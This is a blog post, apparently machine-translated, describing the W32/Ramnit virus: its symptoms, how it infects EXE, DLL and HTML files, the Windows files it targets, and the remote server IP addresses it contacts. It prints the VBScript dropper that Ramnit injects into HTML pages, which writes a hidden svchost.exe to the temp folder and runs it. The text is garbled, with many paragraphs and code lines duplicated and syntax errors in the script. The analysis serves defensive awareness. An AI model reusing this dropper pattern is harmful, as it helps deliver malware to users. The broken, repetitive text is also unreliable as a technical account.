Some symptoms that occur if you are already infected are:
* Pop-up ads or pop-ups to the content of pornography / gambling
In some particular time, the browser will open a pop-up ads or pop-ups that contain pornographic content or gambling (casino). This sometimes makes the user's computer becomes uncomfortable. (see Image 2)
* Pop-up ads or pop-ups to the content of pornography / gambling
In some particular time, the browser will open a pop-up ads or pop-ups that contain pornographic content or gambling (casino). This sometimes makes the user's computer becomes uncomfortable. (see Image 2)
Image2, Pop-up ads that run W32/Ramnit
* Appears script error pop-ups or error after a pop-up ads that appear
After a pop-up ads that appear, will appear a pop-up error or script error from the browser. It appears this error script-like virus "ARP spoofing"in 2008. (see Figure 3)
After a pop-up ads that appear, will appear a pop-up error or script error from the browser. It appears this error script-like virus "ARP spoofing"in 2008. (see Figure 3)
Image3, Pop-up error or script error
Just as the variants of malware sality, Alman and Virut, W32/Ramnit make exe file infection. Only, W32/Ramnit also do infections on the DLL file (dynamic load library).
Exe and dll files in-infection increased by between 100-120 kb, depending on the variant that infects Ramnit. Nevertheless, not all exe and dll files in-infection.
* Injection HTML file
Besides infecting exe files and etc, W32/Ramnit also do injection of HTML files. Injection is done by adding the header and footer. (see image 4 and 5)
In the header, W32/Ramnit add the script:
DropFileName = "svchost.exe"
While in the footer, W32/Ramnit add the script:
Exe and dll files in-infection increased by between 100-120 kb, depending on the variant that infects Ramnit. Nevertheless, not all exe and dll files in-infection.
* Injection HTML file
Besides infecting exe files and etc, W32/Ramnit also do injection of HTML files. Injection is done by adding the header and footer. (see image 4 and 5)
In the header, W32/Ramnit add the script:
DropFileName = "svchost.exe"
Image4, the script is added to the header of the HTML file
While in the footer, W32/Ramnit add the script:
Set FSO = CreateObject ("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName
If FSO.FileExists(DropPath)=False Then
Set fileobj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step2
Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))
Next
Fileobj.close
End If
Set WSHshell = CreateObject ("Wscript.shell")
WSHshell.Run DropPath, 0
DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName
If FSO.FileExists(DropPath)=False Then
Set fileobj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step2
Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))
Next
Fileobj.close
End If
Set WSHshell = CreateObject ("Wscript.shell")
WSHshell.Run DropPath, 0
Image5, the script is added to the footer of the HTML file
With the action to inject the files on the file Iexplore.exe and services.exe file, and add a script to the web files (htm / html) making the function of the Windows services to be blank. (see figure 6)
Image6, the Windows Services function to be blank
* Creating computer hangs / slow and even network connections become disconnected.
Windows system files that would be targeted by injection W32/Ramnit namely:
-C: \ WINDOWS \ system32 \ svchost.exe (file system associated with the network connection, by injecting will make the network disconnected)
Windows system files that would be targeted by injection W32/Ramnit namely:
-C: \ WINDOWS \ system32 \ svchost.exe (file system associated with the network connection, by injecting will make the network disconnected)
-C: \ WINDOWS \ system32 \ lsass.exe (file system-related computer activities, by injecting will make the computer hangs / slow).
-C: \ WINDOWS \ system32 \ services.exe (file system associated with the services and drivers that run)
-C: \ Program Files \ Internet Explorer \ Iexplore.exe (executable file from the internet explorer browser)
*Active in the process of memory
Malware W32/Ramnit try to connect to the Remote Server using Internet Explorer that have been on injection. This can be seen in the task manager, even though we are not open IE / Internet Explorer (see figure 7)
Malware W32/Ramnit try to connect to the Remote Server using Internet Explorer that have been on injection. This can be seen in the task manager, even though we are not open IE / Internet Explorer (see figure 7)
Image7, Process Iexplore.exe (Internet Explorer) that has been injected by W32/Ramnit
* Connect to Remote Server
Malware W32/Ramnit connect to the Remote Server to perform the necessary delivery information on the Remote Server. Remote Server is used that is between them:
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
Malware W32/Ramnit connect to the Remote Server to perform the necessary delivery information on the Remote Server. Remote Server is used that is between them:
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
* Transferring data to a Remote Server
Besides trying to connect and to communicate with a remote server, W32/Ramnit also tried to transfer data from the victim's computer to the Remote Server and vice versa send malware files into the victim's computer. (see image 8)
Besides trying to connect and to communicate with a remote server, W32/Ramnit also tried to transfer data from the victim's computer to the Remote Server and vice versa send malware files into the victim's computer. (see image 8)
Image8, the transfer of data between the victim's computer with Remote Servers
* To broadcast
Just as it worms its Conficker, W32/Ramnit also do broadacast on the network. What was different was to W32/Ramnit only perform at one address, namely: ADX.ADNXS.COM (see image 9)
Image9, conducted by Broadcast W32/Ramnit
0 comments:
Post a Comment